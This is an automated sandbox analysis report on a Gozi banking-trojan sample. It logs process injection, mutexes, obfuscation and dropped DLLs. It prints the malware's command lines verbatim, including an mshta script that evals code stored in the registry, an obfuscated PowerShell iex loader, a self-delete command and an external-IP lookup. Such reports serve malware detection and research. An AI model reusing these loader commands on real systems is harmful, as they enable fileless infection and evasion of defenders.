Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A8185 NtQueryVirtualMemory, 8_2_010A8185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1B38D memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 8_2_03F1B38D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0D317 NtMapViewOfSection, 8_2_03F0D317
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F21AE3 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 8_2_03F21AE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0D274 NtQueryInformationProcess, 8_2_03F0D274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F229E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 8_2_03F229E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0317C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 8_2_03F0317C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0696A GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 8_2_03F0696A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F12931 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 8_2_03F12931
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F076E3 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 8_2_03F076E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1CEED GetProcAddress,NtCreateSection,memset, 8_2_03F1CEED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F17523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 8_2_03F17523
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F08C10 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 8_2_03F08C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F10B30 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 8_2_03F10B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F10A74 NtReadVirtualMemory, 8_2_03F10A74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F2389B NtGetContextThread,RtlNtStatusToDosError, 8_2_03F2389B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0483A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 8_2_03F0483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F03F97 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 8_2_03F03F97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F17EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 8_2_03F17EEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F01641 memset,NtQueryInformationProcess, 8_2_03F01641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F0155B NtQuerySystemInformation,RtlNtStatusToDosError, 8_2_03F0155B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F1E4D5 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 8_2_03F1E4D5
Source: C:\Windows\System32\control.exe Code function: 28_2_00E69994 NtReadVirtualMemory, 28_2_00E69994
Source: C:\Windows\System32\control.exe Code function: 28_2_00E56140 NtAllocateVirtualMemory, 28_2_00E56140
Source: C:\Windows\System32\control.exe Code function: 28_2_00E51B84 NtQueryInformationProcess, 28_2_00E51B84
Source: C:\Windows\System32\control.exe Code function: 28_2_00E6AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose, 28_2_00E6AC44
Source: C:\Windows\System32\control.exe Code function: 28_2_00E73C1C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 28_2_00E73C1C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E7B58C NtSetContextThread,NtUnmapViewOfSection,NtClose, 28_2_00E7B58C
Source: C:\Windows\System32\control.exe Code function: 28_2_00E70E70 NtMapViewOfSection, 28_2_00E70E70
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5E614 NtCreateSection, 28_2_00E5E614
Source: C:\Windows\System32\control.exe Code function: 28_2_00E51FBC NtWriteVirtualMemory, 28_2_00E51FBC
Source: C:\Windows\System32\control.exe Code function: 28_2_00E5FF60 RtlAllocateHeap,NtQueryInformationProcess, 28_2_00E5FF60
Source: C:\Windows\System32\control.exe Code function: 28_2_00E8F01F NtProtectVirtualMemory,NtProtectVirtualMemory, 28_2_00E8F01F
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA81B84 NtQueryInformationProcess, 36_2_0000020FDEA81B84
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEA9AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose, 36_2_0000020FDEA9AC44
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEABF00B NtProtectVirtualMemory,NtProtectVirtualMemory, 36_2_0000020FDEABF00B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303D274 NtQueryInformationProcess, 47_2_0303D274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03051AE3 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 47_2_03051AE3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_030529E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 47_2_030529E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03047523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 47_2_03047523
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03031641 memset,NtQueryInformationProcess, 47_2_03031641
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03047EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 47_2_03047EEF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0303155B NtQuerySystemInformation,RtlNtStatusToDosError, 47_2_0303155B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0304E4D5 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 47_2_0304E4D5
Sample file is different than original file name gathered from version info
Source: gozi.exe Binary or memory string: OriginalFilename vs gozi.exe
Source: gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAdMunch.exe6 vs gozi.exe
Source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEventManager.dll: vs gozi.exe
Source: gozi.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: gozi.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\gozi.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gozi.exe.log Jump to behavior
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winEXE@35/22@10/2
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: gozi.exe Virustotal: Detection: 38%
Source: gozi.exe Metadefender: Detection: 40%
Source: gozi.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\gozi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\gozi.exe "C:\Users\user\Desktop\gozi.exe"
Source: C:\Users\user\Desktop\gozi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gozi.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\3B0F.bi1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdpkmtso.umo.ps1 Jump to behavior
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp Binary or memory string: INSERT INTO `users` (`Login`, `Password`, `Role`) VALUES(@uLogin, @uPassword, @uRole);
Source: gozi.exe Binary or memory string: SELECT * FROM `transport`;
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp Binary or memory string: INSERT INTO `transport` (`Type`, `Consumption`) VALUES(@uType, @uCons);
Source: gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp Binary or memory string: INSERT INTO `waybills` (`DriverId`, `TransportId`, `Distance`, `Price`, `Date`) VALUES(@DriverId, @TransportId, @Distance, @Price, @Date);
Source: gozi.exe Binary or memory string: SELECT * FROM `drivers` WHERE `Login` = @uLogin;
Source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp Binary or memory string: SELECT * FROM `users` WHERE `Login` = @uLogin AND `Password` = @uPassword;
Source: gozi.exe Binary or memory string: SELECT * FROM `drivers` WHERE `Id` = @Id;
Source: gozi.exe Binary or memory string: SELECT * FROM `transport` WHERE `Id` = @Id;
Source: gozi.exe Binary or memory string: SELECT * FROM `waybills`;
Source: C:\Users\user\Desktop\gozi.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A1141 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 8_2_010A1141
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4292:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{C2944618-39CD-4415-D316-7DB8B7AA016C}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4580:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\{C68D421A-6D0A-E8E8-275A-F19C4B2EB590}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6E68996D-F514-D0A1-EF82-F90493D63D78}
Source: C:\Windows\SysWOW64\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\{3AB6673A-5150-7C4D-AB0E-15700F2219A4}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_01
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{22921B96-19EB-A4D9-B376-5D18970AE1CC}
Source: gozi.exe, transport_manager/MainPage.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Users\user\Desktop\gozi.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\gozi.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: gozi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: gozi.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: gozi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdbXP source: powershell.exe, 00000016.00000002.586031203.000002033C29E000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: RegAsm.exe, 00000008.00000003.460334306.00000000044C0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.467008744.0000000004570000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdb source: powershell.exe, 00000016.00000002.585762448.000002033C236000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\5n300s0s.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\transport-manager\obj\Debug\transport-manager.pdb source: gozi.exe, gozi.exe, 00000002.00000000.285133625.0000000000E12000.00000002.00020000.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hscan34n.pdbXP source: powershell.exe, 00000016.00000002.585929205.000002033C272000.00000004.00000001.sdmp
Source: Binary string: EventManager.pdb source: gozi.exe, 00000002.00000002.328151243.0000000004199000.00000004.00000001.sdmp
Source: Binary string: Local\{6FD9BC09-0238-7997-8413-56BDF8F7EA41}n.pdb source: powershell.exe, 00000016.00000003.533928373.000002035019D000.00000004.00000001.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: gozi.exe, transport_manager/MainPage.cs .Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs .Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.gozi.exe.e10000.0.unpack, transport_manager/MainPage.cs .Net Code: MainPage_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010AB72E push ecx; ret 8_2_010AB734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A7F4F push ecx; ret 8_2_010A7F5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010A7BE0 push ecx; ret 8_2_010A7BE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010AB804 push 00000055h; iretd 8_2_010AB808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_010AB6BE push ebp; retf 8_2_010AB6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_03F2541F push ecx; ret 8_2_03F2542F
Source: C:\Windows\System32\control.exe Code function: 28_2_00E772FD push 3B000001h; retf 28_2_00E77302
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020FDEAA72FD push 3B000001h; retf 36_2_0000020FDEAA7302
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03055070 push ecx; ret 47_2_03055079
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_03053D42 push ss; ret 47_2_03053D43
Source: C:\Windows\SysWOW64\cmd.exe Code function: 47_2_0305541F push ecx; ret 47_2_0305542F
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_004012E6 LoadLibraryA,GetProcAddress, 8_2_004012E6
Binary contains a suspicious time stamp
Source: gozi.exe Static PE information: 0xBF44DD64 [Tue Sep 8 18:09:40 2071 UTC]
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline Jump to behavior
Source: initial sample Static PE information: section name: .text entropy: 7.33101766252

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\5n300s0s.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\hscan34n.dll Jump to dropped file

